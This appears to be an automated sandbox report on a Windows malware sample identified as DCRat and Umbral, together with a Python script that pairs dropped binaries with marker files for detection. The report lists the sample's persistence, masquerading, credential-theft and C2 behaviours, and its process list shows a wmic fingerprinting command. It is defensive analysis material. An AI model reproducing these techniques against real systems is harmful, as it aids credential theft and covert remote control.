| SHA1 | 9ce58c735d017f14510772fb4d44528177509c59 |
| SHA256 | 7d83e686176e73272f93deb3a961be58d15414f0b24fff41b12a83a2771635b6 |
| SHA512 | 94d418bac88c3e2a15a12a3157fdf5a43b434302a958813af47ffff74dcfdec8695e8566d07292246b43d3a47f2233c6e31deb2345be736a99f906a0ebd9e2b1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-05 01:28
Reported
2024-05-05 01:30
Platform
win10v2004-20240419-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inject.exe | N/A |
| N/A | N/A | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Internet Explorer\en-US\f3b6ecef712a24 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\6cb0b6c459d5d3 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\uk-UA\69ddcba757bf72 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\eddb19405b7ce1 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\6cb0b6c459d5d3 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\Internet Explorer\en-US\spoolsv.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\56085415360792 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\dwm.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Speech_OneCore\Engines\e6c9b481da804f | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\Migration\WTR\SppExtComObj.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\Migration\WTR\e1ef82546f0b02 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\INF\winlogon.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\INF\cc11b995f2a76d | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
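The two drop tables above share one pattern: every target directory receives an executable named after a Windows system process (winlogon.exe, smss.exe, dwm.exe, spoolsv.exe, SppExtComObj.exe and so on) together with a companion file whose name is 14 lowercase hexadecimal characters, and the same companion name (6cb0b6c459d5d3) sits beside dwm.exe in both directories it was dropped into. The Python below is an added example, not part of the sandbox output, that pairs those binaries with their markers per directory from "File created" events. FILE_EVENTS is constructed from the rows above plus two benign control paths; the 14-hex marker shape is an observation from this report, not a documented format.

```python
"""Pair masquerading dropped binaries with their companion marker files.

Added example, not part of the sandbox output. FILE_EVENTS is constructed
from the "File created" rows in the report plus two benign control paths;
the 14-hex-character marker convention is an observation from this report.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Windows binaries whose names the dropper reuses for its copies.
SYSTEM_PROCESS_NAMES = {
    "csrss.exe", "winlogon.exe", "smss.exe", "dwm.exe", "spoolsv.exe", "wininit.exe",
    "conhost.exe", "dllhost.exe", "runtimebroker.exe", "sppextcomobj.exe",
    "backgroundtaskhost.exe", "officeclicktorun.exe",
}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
MARKER_NAME = re.compile(r"^[0-9a-f]{14}$")

FILE_EVENTS = [
    r"C:\Program Files\Internet Explorer\en-US\f3b6ecef712a24",
    r"C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe",
    r"C:\Program Files (x86)\Common Files\6cb0b6c459d5d3",
    r"C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe",
    r"C:\Program Files (x86)\Windows Photo Viewer\uk-UA\69ddcba757bf72",
    r"C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe",
    r"C:\Program Files\Microsoft Office 15\ClientX64\eddb19405b7ce1",
    r"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe",
    r"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\6cb0b6c459d5d3",
    r"C:\Program Files\Internet Explorer\en-US\spoolsv.exe",
    r"C:\Program Files (x86)\Windows Multimedia Platform\56085415360792",
    r"C:\Program Files (x86)\Common Files\dwm.exe",
    r"C:\Windows\Speech_OneCore\Engines\e6c9b481da804f",
    r"C:\Windows\Migration\WTR\SppExtComObj.exe",
    r"C:\Windows\Migration\WTR\e1ef82546f0b02",
    r"C:\Windows\INF\winlogon.exe",
    r"C:\Windows\INF\cc11b995f2a76d",
    r"C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe",
    # Constructed benign control rows: a real System32 binary and an ordinary log.
    r"C:\Windows\System32\conhost.exe",
    r"C:\Program Files\Contoso\update.log",
]


def classify(path):
    """'binary' for a system-process name outside System32/SysWOW64,
    'marker' for a 14-hex companion file, None for anything else."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name in SYSTEM_PROCESS_NAMES and not str(p).lower().startswith(TRUSTED_DIRS):
        return "binary"
    if MARKER_NAME.match(name):
        return "marker"
    return None


def pair_drops(paths):
    """Group drops by directory and return {dir: (binaries, markers)} for every
    directory that received at least one masquerading binary."""
    by_dir = defaultdict(lambda: {"binary": [], "marker": []})
    for path in paths:
        kind = classify(path)
        if kind:
            p = PureWindowsPath(path)
            by_dir[str(p.parent)][kind].append(p.name)
    return {d: (sorted(v["binary"]), sorted(v["marker"]))
            for d, v in by_dir.items() if v["binary"]}


def marker_for(paths):
    """Map each binary name to the marker names dropped beside it; a marker that
    repeats across directories ties those copies to the same payload."""
    seen = defaultdict(set)
    for binaries, markers in pair_drops(paths).values():
        for binary in binaries:
            seen[binary.lower()].update(markers)
    return dict(seen)


if __name__ == "__main__":
    for directory, (binaries, markers) in sorted(pair_drops(FILE_EVENTS).items()):
        print(f"{directory}\n    binaries={binaries} markers={markers}")
```

Fed with file-creation telemetry instead of the constructed list, the same grouping turns a flood of individual "File created" events into one finding per staging directory, and the marker map shows which directories hold copies of the same component.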
Enumerates physical storage devices
Creates scheduled task(s)
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
C:\Users\Admin\AppData\Local\Temp\stealer.exe
"C:\Users\Admin\AppData\Local\Temp\stealer.exe"
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
C:\Users\Admin\AppData\Local\Temp\Inject.exe
"C:\Users\Admin\AppData\Local\Temp\Inject.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
